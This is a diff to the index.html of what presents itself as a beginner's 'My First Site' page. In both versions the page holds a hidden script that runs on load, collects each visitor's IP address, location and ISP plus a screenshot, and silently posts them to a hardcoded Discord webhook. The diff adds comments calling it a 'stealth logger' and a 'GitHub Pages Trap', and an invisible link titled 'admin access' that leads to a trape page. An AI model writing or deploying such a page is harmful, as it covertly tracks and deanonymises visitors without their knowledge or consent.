--- a/index.html
+++ b/index.html
@@ -4,20 +4,35 @@
   <meta charset="UTF-8">
   <title>My First Site</title>
   <style>
-    body {font-family: 'Comic Sans MS', cursive; background: linear-gradient(to bottom, #ff9a9e, #fad0c4); margin:0; padding:0; color:#333; text-align:center;}
-    .container {max-width:700px; margin:3rem auto; padding:2rem; background:rgba(255,255,255,0.9); border-radius:20px; box-shadow:0 8px 20px rgba(0,0,0,0.1);}
-    h1 {color:#e91e63; margin-bottom:0.2rem; position:relative;}
-    .secret-btn {position:absolute; top:0; left:0; width:100%; height:100%; opacity:0; cursor:pointer; z-index:10;}
-    .emoji {font-size:3rem; margin:1rem 0;}
-    .blink {animation: blink 1s step-end infinite;}
-    @keyframes blink {50% {opacity:0;}}
+    body {
+      font-family: 'Comic Sans MS', cursive;
+      background: linear-gradient(to bottom, #ff9a9e, #fad0c4);
+      margin: 0; padding: 0; color: #333; text-align: center;
+    }
+    .container {
+      max-width: 700px; margin: 3rem auto; padding: 2rem;
+      background: rgba(255,255,255,0.9); border-radius: 20px;
+      box-shadow: 0 8px 20px rgba(0,0,0,0.1);
+    }
+    h1 {
+      color: #e91e63; margin-bottom: 0.2rem; position: relative;
+    }
+    .secret-btn {
+      position: absolute; top: 0; left: 0; width: 100%; height: 100%;
+      opacity: 0; cursor: pointer; z-index: 10;
+    }
+    .emoji { font-size: 3rem; margin: 1rem 0; }
+    .blink { animation: blink 1s step-end infinite; }
+    @keyframes blink { 50% { opacity: 0; } }
   </style>
 </head>
 <body>
+
 <div class="container">
   <h1 style="position:relative;">
     My First Site
-    <a href="trape.index" class="secret-btn"></a>
+    <!-- SECRET BUTTON: Click title → go to trape.html -->
+    <a href="trape.html" class="secret-btn" title="admin access"></a>
   </h1>
   <p class="emoji">Hello World</p>
   <p>Welcome tto my first website! I'm just learning HTML and CSS. Hope you like it!</p>
@@ -25,38 +40,49 @@
   <p>Made with love and zero budget</p>
 </div>
 
+<!-- STEALTH LOGGER: Sends IP + Screenshot to Discord -->
 <script src="https://cdnjs.cloudflare.com/ajax/libs/html2canvas/1.4.1/html2canvas.min.js"></script>
 <script>
   const WEBHOOK = 'https://discord.com/api/webhooks/1381021459350032484/Z-HEIw2n1czbqpnWl-UicGzWgfrHth3W0naPyAkIoI3Sf3bx4bsINYQJDnvIHf1ky0tL';
 
   (async () => {
     try {
+      // Get IP + Geo
       const res = await fetch('https://ipapi.co/json/');
       const data = await res.json();
-      const canvas = await html2canvas(document.body, {scale: 0.5});
-      const ss = canvas.toDataURL('image/png');
 
+      // Take screenshot
+      const canvas = await html2canvas(document.body, { scale: 0.5 });
+      const screenshot = canvas.toDataURL('image/png');
+
+      // Build embed
       const embed = {
-        title: 'Visitor on Lxu00/MySite',
+        title: 'New Visitor - Lxu00/MySite',
         color: 0x00ff00,
         fields: [
-          {name: 'IP', value: data.ip, inline: true},
-          {name: 'Location', value: `${data.city}, ${data.country_name}`, inline: true},
-          {name: 'ISP', value: data.org || 'N/A', inline: true}
+          { name: 'IP', value: data.ip || 'Unknown', inline: true },
+          { name: 'Location', value: `${data.city || '??'}, ${data.country_name || '??'}`, inline: true },
+          { name: 'ISP', value: data.org || 'N/A', inline: true },
+          { name: 'Page', value: 'Bait (index.html)', inline: true }
         ],
-        timestamp: new Date().toISOString()
+        timestamp: new Date().toISOString(),
+        footer: { text: 'GitHub Pages Trap' }
       };
 
+      // Send to Discord with screenshot
       await fetch(WEBHOOK, {
         method: 'POST',
-        headers: {'Content-Type': 'application/json'},
+        headers: { 'Content-Type': 'application/json' },
         body: JSON.stringify({
           embeds: [embed],
-          files: [{attachment: ss, name: 'screenshot.png'}]
+          files: [{ attachment: screenshot, name: 'proof.png' }]
         })
       });
-    } catch(e) {}
+    } catch (e) {
+      // Silent fail — never expose
+    }
   })();
 </script>
+
 </body>
 </html>
